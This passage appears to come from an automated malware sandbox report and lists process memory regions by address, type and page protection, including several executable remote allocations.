page execute and read and write
|
||
|
3EC0000
|
trusted library allocation
|
page read and write
|
||
|
1280000
|
trusted library allocation
|
page read and write
|
||
|
B35D000
|
stack
|
page read and write
|
||
|
68CF000
|
stack
|
page read and write
|
||
|
69FE000
|
stack
|
page read and write
|
||
|
5D0C000
|
heap
|
page read and write
|
||
|
67CE000
|
stack
|
page read and write
|
||
|
1260000
|
trusted library allocation
|
page read and write
|
||
|
5706000
|
trusted library allocation
|
page read and write
|
||
|
4085000
|
trusted library allocation
|
page read and write
|
||
|
3F25000
|
trusted library allocation
|
page read and write
|
||
|
3DF3000
|
trusted library allocation
|
page read and write
|
||
|
12B0000
|
heap
|
page execute and read and write
|
||
|
4014000
|
trusted library allocation
|
page read and write
|
||
|
B80E000
|
stack
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
4492000
|
trusted library allocation
|
page read and write
|
||
|
5160000
|
trusted library allocation
|
page read and write
|
||
|
40D000
|
remote allocation
|
page execute and read and write
|
||
|
18F0000
|
heap
|
page read and write
|
||
|
461B000
|
trusted library allocation
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
370E000
|
stack
|
page read and write
|
||
|
2E34000
|
trusted library allocation
|
page read and write
|
||
|
6B50000
|
trusted library allocation
|
page read and write
|
||
|
40EA000
|
trusted library allocation
|
page read and write
|
||
|
3F3D000
|
trusted library allocation
|
page read and write
|
||
|
458C000
|
trusted library allocation
|
page read and write
|
||
|
155B000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CB5000
|
trusted library allocation
|
page read and write
|
||
|
3704000
|
trusted library allocation
|
page read and write
|
||
|
52A2000
|
trusted library allocation
|
page read and write
|
||
|
729E000
|
stack
|
page read and write
|
||
|
6AA0000
|
trusted library allocation
|
page read and write
|
||
|
5114000
|
trusted library allocation
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
3EBD000
|
trusted library allocation
|
page read and write
|
||
|
4384000
|
trusted library allocation
|
page read and write
|
||
|
2C20000
|
trusted library allocation
|
page read and write
|
||
|
3ED6000
|
trusted library allocation
|
page read and write
|
||
|
358A000
|
trusted library allocation
|
page read and write
|
||
|
2F5F000
|
trusted library allocation
|
page read and write
|
||
|
3454000
|
trusted library allocation
|
page read and write
|
||
|
2C91000
|
trusted library allocation
|
page read and write
|
||
|
1510000
|
trusted library allocation
|
page read and write
|
||
|
549B000
|
stack
|
page read and write
|
||
|
2E30000
|
trusted library allocation
|
page read and write
|
||
|
1270000
|
trusted library allocation
|
page read and write
|
||
|
12C0000
|
trusted library allocation
|
page read and write
|
||
|
8C69000
|
heap
|
page read and write
|
||
|
5556000
|
trusted library allocation
|
page read and write
|
||
|
42C9000
|
trusted library allocation
|
page read and write
|
||
|
B5AE000
|
stack
|
page read and write
|
||
|
173D000
|
heap
|
page read and write
|
||
|
5420000
|
trusted library allocation
|
page execute and read and write
|
||
|
56E6000
|
trusted library allocation
|
page read and write
|
||
|
312E000
|
unkown
|
page read and write
|
||
|
4528000
|
trusted library allocation
|
page read and write
|
||
|
4116000
|
trusted library allocation
|
page read and write
|
||
|
334C000
|
trusted library allocation
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
4456000
|
trusted library allocation
|
page read and write
|
||
|
43ED000
|
trusted library allocation
|
page read and write
|
||
|
512E000
|
trusted library allocation
|
page read and write
|
||
|
51A0000
|
trusted library allocation
|
page read and write
|
||
|
10CE000
|
heap
|
page read and write
|
||
|
45F7000
|
trusted library allocation
|
page read and write
|
||
|
E18000
|
heap
|
page read and write
|
||
|
407C000
|
trusted library allocation
|
page read and write
|
||
|
1117000
|
heap
|
page read and write
|
||
|
14D0000
|
heap
|
page read and write
|
||
|
2BE5000
|
trusted library allocation
|
page read and write
|
||
|
316F000
|
unkown
|
page read and write
|
||
|
5260000
|
trusted library section
|
page readonly
|
||
|
43F4000
|
trusted library allocation
|
page read and write
|
||
|
4377000
|
trusted library allocation
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
6EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BBE000
|
stack
|
page read and write
|
||
|
55E0000
|
trusted library allocation
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page execute and read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
2D8F000
|
stack
|
page read and write
|
||
|
3340000
|
trusted library allocation
|
page read and write
|
||
|
6F60000
|
trusted library allocation
|
page read and write
|
||
|
4538000
|
trusted library allocation
|
page read and write
|
||
|
55D2000
|
trusted library allocation
|
page read and write
|
||
|
2E4C000
|
trusted library allocation
|
page read and write
|
||
|
6E7E000
|
stack
|
page read and write
|
||
|
F28000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
1640000
|
heap
|
page read and write
|
||
|
1737000
|
heap
|
page read and write
|
||
|
E55000
|
heap
|
page read and write
|
||
|
6BBE000
|
stack
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
3C41000
|
trusted library allocation
|
page read and write
|
||
|
5E80000
|
trusted library section
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
BFAC000
|
stack
|
page read and write
|
||
|
FFE000
|
stack
|
page read and write
|
||
|
6BA0000
|
trusted library allocation
|
page read and write
|
||
|
1230000
|
trusted library allocation
|
page read and write
|
||
|
6AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1282000
|
trusted library allocation
|
page read and write
|
||
|
5715000
|
heap
|
page read and write
|
||
|
53B0000
|
heap
|
page read and write
|
||
|
894E000
|
stack
|
page read and write
|
||
|
7408000
|
trusted library allocation
|
page read and write
|
||
|
45F4000
|
trusted library allocation
|
page read and write
|
||
|
51E2000
|
trusted library allocation
|
page read and write
|
||
|
B21E000
|
stack
|
page read and write
|
||
|
1300000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
40E4000
|
trusted library allocation
|
page read and write
|
||
|
126A000
|
trusted library allocation
|
page execute and read and write
|
||
|
5181000
|
trusted library allocation
|
page read and write
|
||
|
45E5000
|
trusted library allocation
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
5670000
|
heap
|
page read and write
|
||
|
1273000
|
trusted library allocation
|
page execute and read and write
|
||
|
36A8000
|
trusted library allocation
|
page read and write
|
||
|
4137000
|
trusted library allocation
|
page read and write
|
||
|
1244000
|
trusted library allocation
|
page read and write
|
||
|
518D000
|
trusted library allocation
|
page read and write
|
||
|
513D000
|
trusted library allocation
|
page read and write
|
||
|
2F53000
|
trusted library allocation
|
page read and write
|
||
|
4DCC000
|
stack
|
page read and write
|
||
|
3264000
|
trusted library allocation
|
page read and write
|
||
|
400C000
|
trusted library allocation
|
page read and write
|
||
|
2D64000
|
trusted library allocation
|
page read and write
|
||
|
1270000
|
trusted library allocation
|
page read and write
|
||
|
1240000
|
trusted library allocation
|
page read and write
|
||
|
6676000
|
heap
|
page read and write
|
||
|
45C5000
|
trusted library allocation
|
page read and write
|
||
|
6F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
575D000
|
stack
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
43BD000
|
trusted library allocation
|
page read and write
|
||
|
15A0000
|
trusted library allocation
|
page read and write
|
||
|
51F0000
|
heap
|
page read and write
|
||
|
5154000
|
trusted library allocation
|
page read and write
|
||
|
3760000
|
trusted library allocation
|
page read and write
|
||
|
6AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1270000
|
trusted library allocation
|
page read and write
|
||
|
4458000
|
trusted library allocation
|
page read and write
|
||
|
2C76000
|
trusted library allocation
|
page read and write
|
||
|
4523000
|
trusted library allocation
|
page read and write
|
||
|
6A8E000
|
stack
|
page read and write
|
||
|
72DE000
|
stack
|
page read and write
|
||
|
EFE000
|
stack
|
page read and write
|
||
|
3FF3000
|
trusted library allocation
|
page read and write
|
||
|
B360000
|
heap
|
page read and write
|
||
|
4361000
|
trusted library allocation
|
page read and write
|
||
|
5CC0000
|
heap
|
page read and write
|
||
|
2C41000
|
trusted library allocation
|
page read and write
|
||
|
66BB000
|
heap
|
page read and write
|
||
|
4118000
|
trusted library allocation
|
page read and write
|
||
|
55D0000
|
trusted library allocation
|
page read and write
|
||
|
E60000
|
heap
|
page read and write
|
||
|
40A000
|
remote allocation
|
page execute and read and write
|
||
|
3354000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D62000
|
trusted library allocation
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
3F2E000
|
trusted library allocation
|
page read and write
|
||
|
6930000
|
heap
|
page read and write
|
||
|
B4AE000
|
stack
|
page read and write
|
||
|
5960000
|
heap
|
page execute and read and write
|
||
|
4597000
|
trusted library allocation
|
page read and write
|
||
|
2C80000
|
heap
|
page execute and read and write
|
||
|
2B70000
|
trusted library allocation
|
page read and write
|
||
|
B88C000
|
stack
|
page read and write
|
||
|
3E76000
|
trusted library allocation
|
page read and write
|
||
|
32FD000
|
trusted library allocation
|
page read and write
|
||
|
31F5000
|
trusted library allocation
|
page read and write
|
||
|
30E3000
|
trusted library allocation
|
page read and write
|
||
|
1262000
|
trusted library allocation
|
page read and write
|
||
|
12A3000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
40C9000
|
trusted library allocation
|
page read and write
|
||
|
6F57000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
trusted library allocation
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
4087000
|
trusted library allocation
|
page read and write
|
||
|
187E000
|
stack
|
page read and write
|
||
|
1274000
|
trusted library allocation
|
page read and write
|
||
|
EB0000
|
heap
|
page read and write
|
||
|
44FF000
|
trusted library allocation
|
page read and write
|
||
|
44AA000
|
trusted library allocation
|
page read and write
|
||
|
4D1B000
|
stack
|
page read and write
|
||
|
6E5E000
|
heap
|
page read and write
|
||
|
694F000
|
stack
|
page read and write
|
||
|
5D50000
|
heap
|
page read and write
|
||
|
528E000
|
trusted library allocation
|
page read and write
|
||
|
6B87000
|
trusted library allocation
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
36D6000
|
trusted library allocation
|
page read and write
|
||
|
4044000
|
trusted library allocation
|
page read and write
|
||
|
2F40000
|
trusted library allocation
|
page read and write
|
||
|
463F000
|
trusted library allocation
|
page read and write
|
||
|
5570000
|
heap
|
page execute and read and write
|
||
|
5296000
|
trusted library allocation
|
page read and write
|
||
|
1524000
|
trusted library allocation
|
page read and write
|
||
|
4392000
|
trusted library allocation
|
page read and write
|
||
|
4D98000
|
trusted library allocation
|
page read and write
|
||
|
3D2B000
|
trusted library allocation
|
page read and write
|
||
|
773E000
|
stack
|
page read and write
|
||
|
5240000
|
trusted library allocation
|
page read and write
|
||
|
6E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
76B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FE000
|
stack
|
page read and write
|
||
|
5175000
|
trusted library allocation
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
900E000
|
stack
|
page read and write
|
||
|
1276000
|
trusted library allocation
|
page execute and read and write
|
||
|
5230000
|
trusted library allocation
|
page read and write
|
||
|
43E6000
|
trusted library allocation
|
page read and write
|
||
|
5C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
402000
|
remote allocation
|
page execute and read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
1610000
|
trusted library allocation
|
page read and write
|
||
|
3760000
|
heap
|
page read and write
|
||
|
5170000
|
trusted library allocation
|
page read and write
|
||
|
3489000
|
trusted library allocation
|
page read and write
|
||
|
345E000
|
trusted library allocation
|
page read and write
|
||
|
8C6D000
|
heap
|
page read and write
|
||
|
10FE000
|
stack
|
page read and write
|
||
|
5540000
|
trusted library allocation
|
page read and write
|
||
|
BD3E000
|
stack
|
page read and write
|
||
|
5270000
|
trusted library allocation
|
page read and write
|
||
|
3433000
|
trusted library allocation
|
page read and write
|
||
|
3DB3000
|
trusted library allocation
|
page read and write
|
||
|
701B000
|
heap
|
page read and write
|
||
|
2FDC000
|
trusted library allocation
|
page read and write
|
||
|
40C000
|
remote allocation
|
page execute and read and write
|
||
|
5450000
|
heap
|
page execute and read and write
|
||
|
112E000
|
stack
|
page read and write
|
||
|
122E000
|
stack
|
page read and write
|
||
|
4534000
|
trusted library allocation
|
page read and write
|
||
|
12A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
40F2000
|
trusted library allocation
|
page read and write
|
||
|
307A000
|
stack
|
page read and write
|
||
|
5270000
|
heap
|
page read and write
|
||
|
4515000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
3437000
|
trusted library allocation
|
page read and write
|
||
|
5220000
|
trusted library allocation
|
page read and write
|
||
|
52B0000
|
trusted library allocation
|
page read and write
|
||
|
33EF000
|
unkown
|
page read and write
|
||
|
3110000
|
trusted library allocation
|
page read and write
|
||
|
6E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E3F000
|
stack
|
page read and write
|
||
|
1290000
|
heap
|
page read and write
|
||
|
B11E000
|
stack
|
page read and write
|
||
|
6B80000
|
trusted library allocation
|
page read and write
|
||
|
1012000
|
heap
|
page read and write
|
||
|
2BCE000
|
stack
|
page read and write
|
||
|
2E0B000
|
trusted library allocation
|
page read and write
|
||
|
452A000
|
trusted library allocation
|
page read and write
|
||
|
3F9A000
|
trusted library allocation
|
page read and write
|
||
|
531B000
|
stack
|
page read and write
|
||
|
744E000
|
stack
|
page read and write
|
||
|
6F70000
|
trusted library allocation
|
page read and write
|
||
|
BB0E000
|
stack
|
page read and write
|
||
|
B73E000
|
stack
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
6F20000
|
trusted library allocation
|
page read and write
|
||
|
56EB000
|
trusted library allocation
|
page read and write
|
||
|
3481000
|
trusted library allocation
|
page read and write
|
||
|
2ABE000
|
stack
|
page read and write
|
||
|
6EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BE0000
|
trusted library allocation
|
page read and write
|
||
|
3DFB000
|
trusted library allocation
|
page read and write
|
||
|
55C0000
|
trusted library allocation
|
page read and write
|
||
|
351C000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
3EAE000
|
trusted library allocation
|
page read and write
|
||
|
1570000
|
trusted library allocation
|
page read and write
|
||
|
12D7000
|
heap
|
page read and write
|
||
|
1280000
|
trusted library allocation
|
page read and write
|
||
|
678E000
|
stack
|
page read and write
|
||
|
348F000
|
trusted library allocation
|
page read and write
|
||
|
517E000
|
trusted library allocation
|
page read and write
|
||
|
533D000
|
stack
|
page read and write
|
||
|
3E7C000
|
trusted library allocation
|
page read and write
|
||
|
4024000
|
trusted library allocation
|
page read and write
|
||
|
328D000
|
trusted library allocation
|
page read and write
|
||
|
4638000
|
trusted library allocation
|
page read and write
|
||
|
4536000
|
trusted library allocation
|
page read and write
|
||
|
410000
|
remote allocation
|
page execute and read and write
|
||
|
152D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BD3000
|
heap
|
page read and write
|
||
|
2E40000
|
trusted library allocation
|
page read and write
|
||
|
2F75000
|
trusted library allocation
|
page read and write
|
||
|
788D000
|
stack
|
page read and write
|
||
|
1260000
|
trusted library allocation
|
page read and write
|
||
|
5164000
|
trusted library allocation
|
page read and write
|
||
|
424000
|
remote allocation
|
page execute and read and write
|
||
|
3079000
|
trusted library allocation
|
page read and write
|
||
|
40F000
|
remote allocation
|
page execute and read and write
|
||
|
4D90000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
trusted library allocation
|
page read and write
|
||
|
3C99000
|
trusted library allocation
|
page read and write
|
||
|
5BAE000
|
stack
|
page read and write
|
||
|
5860000
|
heap
|
page read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
12A2000
|
trusted library allocation
|
page read and write
|
||
|
3348000
|
trusted library allocation
|
page read and write
|
||
|
1780000
|
heap
|
page read and write
|
||
|
FBE000
|
stack
|
page read and write
|
||
|
6B7E000
|
stack
|
page read and write
|
||
|
4371000
|
trusted library allocation
|
page read and write
|
||
|
2F71000
|
trusted library allocation
|
page read and write
|
||
|
34B3000
|
trusted library allocation
|
page read and write
|
||
|
57A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12B7000
|
trusted library allocation
|
page execute and read and write
|
||
|
3EEC000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
43D0000
|
trusted library allocation
|
page read and write
|
||
|
3E51000
|
trusted library allocation
|
page read and write
|
||
|
3487000
|
trusted library allocation
|
page read and write
|
||
|
3E74000
|
trusted library allocation
|
page read and write
|
||
|
8EEE000
|
stack
|
page read and write
|
||
|
3ECC000
|
trusted library allocation
|
page read and write
|
||
|
1550000
|
trusted library allocation
|
page read and write
|
||
|
8D3E000
|
stack
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
527B000
|
trusted library allocation
|
page read and write
|
||
|
5202000
|
trusted library allocation
|
page read and write
|
||
|
4020000
|
trusted library allocation
|
page read and write
|
||
|
12D0000
|
heap
|
page read and write
|
||
|
527E000
|
trusted library allocation
|
page read and write
|
||
|
5701000
|
trusted library allocation
|
page read and write
|
||
|
43CD000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
326A000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
45DF000
|
trusted library allocation
|
page read and write
|
||
|
5291000
|
trusted library allocation
|
page read and write
|
||
|
43D000
|
remote allocation
|
page execute and read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
F19000
|
stack
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
3F48000
|
trusted library allocation
|
page read and write
|
||
|
3456000
|
trusted library allocation
|
page read and write
|
||
|
B25D000
|
stack
|
page read and write
|
||
|
6B90000
|
trusted library allocation
|
page read and write
|
||
|
BC3E000
|
stack
|
page read and write
|
||
|
408000
|
remote allocation
|
page execute and read and write
|
||
|
744E000
|
stack
|
page read and write
|
||
|
3EA0000
|
trusted library allocation
|
page read and write
|
||
|
1557000
|
trusted library allocation
|
page execute and read and write
|
||
|
4595000
|
trusted library allocation
|
page read and write
|
||
|
57BE000
|
stack
|
page read and write
|
||
|
1074000
|
heap
|
page read and write
|
||
|
104E000
|
heap
|
page read and write
|
||
|
784D000
|
stack
|
page read and write
|
||
|
3732000
|
trusted library allocation
|
page read and write
|
||
|
D81000
|
heap
|
page read and write
|
||
|
56FE000
|
stack
|
page read and write
|
||
|
54C0000
|
heap
|
page execute and read and write
|
||
|
401A000
|
trusted library allocation
|
page read and write
|
||
|
5CD9000
|
heap
|
page read and write
|
||
|
6962000
|
heap
|
page read and write
|
||
|
437F000
|
trusted library allocation
|
page read and write
|
||
|
3308000
|
trusted library allocation
|
page read and write
|
||
|
1540000
|
trusted library allocation
|
page read and write
|
||
|
B01E000
|
stack
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
trusted library allocation
|
page read and write
|
||
|
3EDC000
|
trusted library allocation
|
page read and write
|
||
|
5707000
|
trusted library allocation
|
page read and write
|
||
|
6E50000
|
heap
|
page read and write
|
||
|
30A9000
|
trusted library allocation
|
page read and write
|
||
|
6F40000
|
trusted library allocation
|
page read and write
|
||
|
353B000
|
heap
|
page read and write
|
||
|
66B7000
|
heap
|
page read and write
|
||
|
5400000
|
heap
|
page read and write
|
||
|
45D9000
|
trusted library allocation
|
page read and write
|
||
|
55F0000
|
heap
|
page read and write
|
||
|
40FE000
|
trusted library allocation
|
page read and write
|
||
|
3D91000
|
trusted library allocation
|
page read and write
|
||
|
1307000
|
heap
|
page read and write
|
||
|
4061000
|
trusted library allocation
|
page read and write
|
||
|
674D000
|
stack
|
page read and write
|
||
|
18BC000
|
stack
|
page read and write
|
||
|
1272000
|
trusted library allocation
|
page read and write
|
||
|
11FF000
|
stack
|
page read and write
|
||
|
5810000
|
trusted library allocation
|
page read and write
|
||
|
2BC0000
|
trusted library allocation
|
page read and write
|
||
|
2E50000
|
trusted library allocation
|
page read and write
|
||
|
1555000
|
trusted library allocation
|
page execute and read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
57B0000
|
trusted library allocation
|
page read and write
|
||
|
EF7000
|
stack
|
page read and write
|
||
|
2FEA000
|
stack
|
page read and write
|
||
|
412F000
|
trusted library allocation
|
page read and write
|
||
|
2DED000
|
trusted library allocation
|
page read and write
|
||
|
3F76000
|
trusted library allocation
|
page read and write
|
||
|
2DFC000
|
trusted library allocation
|
page read and write
|
||
|
160E000
|
stack
|
page read and write
|
||
|
15B0000
|
trusted library allocation
|
page read and write
|
||
|
8EAE000
|
stack
|
page read and write
|
||
|
123F000
|
stack
|
page read and write
|
||
|
2E48000
|
trusted library allocation
|
page read and write
|
||
|
403000
|
remote allocation
|
page execute and read and write
|
||
|
2F48000
|
trusted library allocation
|
page read and write
|
||
|
14F5000
|
heap
|
page read and write
|
||
|
2F84000
|
trusted library allocation
|
page read and write
|
||
|
4574000
|
trusted library allocation
|
page read and write
|
||
|
5D10000
|
heap
|
page read and write
|
||
|
4128000
|
trusted library allocation
|
page read and write
|
||
|
4028000
|
trusted library allocation
|
page read and write
|
||
|
1263000
|
trusted library allocation
|
page read and write
|
||
|
6B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
15C0000
|
heap
|
page read and write
|
||
|
5136000
|
trusted library allocation
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
EB6000
|
heap
|
page read and write
|
||
|
72A0000
|
heap
|
page read and write
|
||
|
31A8000
|
trusted library allocation
|
page read and write
|
||
|
5150000
|
trusted library allocation
|
page read and write
|
||
|
124D000
|
trusted library allocation
|
page execute and read and write
|
||
|
51E0000
|
trusted library allocation
|
page read and write
|
||
|
4F2E000
|
stack
|
page read and write
|
||
|
2AC8000
|
trusted library allocation
|
page read and write
|
||
|
127D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7460000
|
heap
|
page read and write
|
||
|
2DF8000
|
trusted library allocation
|
page read and write
|
||
|
10BF000
|
stack
|
page read and write
|
||
|
4390000
|
trusted library allocation
|
page read and write
|
||
|
367A000
|
trusted library allocation
|
page read and write
|
||
|
4112000
|
trusted library allocation
|
page read and write
|
||
|
300C000
|
trusted library allocation
|
page read and write
|
||
|
8E60000
|
trusted library allocation
|
page read and write
|
||
|
3F82000
|
trusted library allocation
|
page read and write
|
||
|
2F4E000
|
trusted library allocation
|
page read and write
|
||
|
6FB0000
|
heap
|
page read and write
|
||
|
41C000
|
remote allocation
|
page execute and read and write
|
||
|
3F46000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
trusted library allocation
|
page read and write
|
||
|
5CFE000
|
heap
|
page read and write
|
||
|
C1EE000
|
stack
|
page read and write
|
||
|
2F77000
|
trusted library allocation
|
page read and write
|
||
|
35BA000
|
trusted library allocation
|
page read and write
|
||
|
5276000
|
trusted library allocation
|
page read and write
|
||
|
6FB0000
|
heap
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
51E3000
|
heap
|
page read and write
|
||
|
3D9B000
|
trusted library allocation
|
page read and write
|
||
|
DE2000
|
heap
|
page read and write
|
||
|
650E000
|
stack
|
page read and write
|
||
|
33A9000
|
trusted library allocation
|
page read and write
|
||
|
6923000
|
heap
|
page read and write
|
||
|
335C000
|
trusted library allocation
|
page read and write
|
||
|
43B0000
|
trusted library allocation
|
page read and write
|
||
|
1310000
|
heap
|
page read and write
|
||
|
12B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
529D000
|
trusted library allocation
|
page read and write
|
||
|
3EC4000
|
trusted library allocation
|
page read and write
|
||
|
410B000
|
trusted library allocation
|
page read and write
|
||
|
2C74000
|
trusted library allocation
|
page read and write
|
||
|
40DA000
|
trusted library allocation
|
page read and write
|
||
|
3E4B000
|
trusted library allocation
|
page read and write
|
||
|
1530000
|
trusted library allocation
|
page read and write
|
||
|
4026000
|
trusted library allocation
|
page read and write
|
||
|
40B000
|
remote allocation
|
page execute and read and write
|
||
|
336E000
|
unkown
|
page read and write
|
||
|
4CCB000
|
stack
|
page read and write
|
There are 766 hidden memdumps, click here to show them.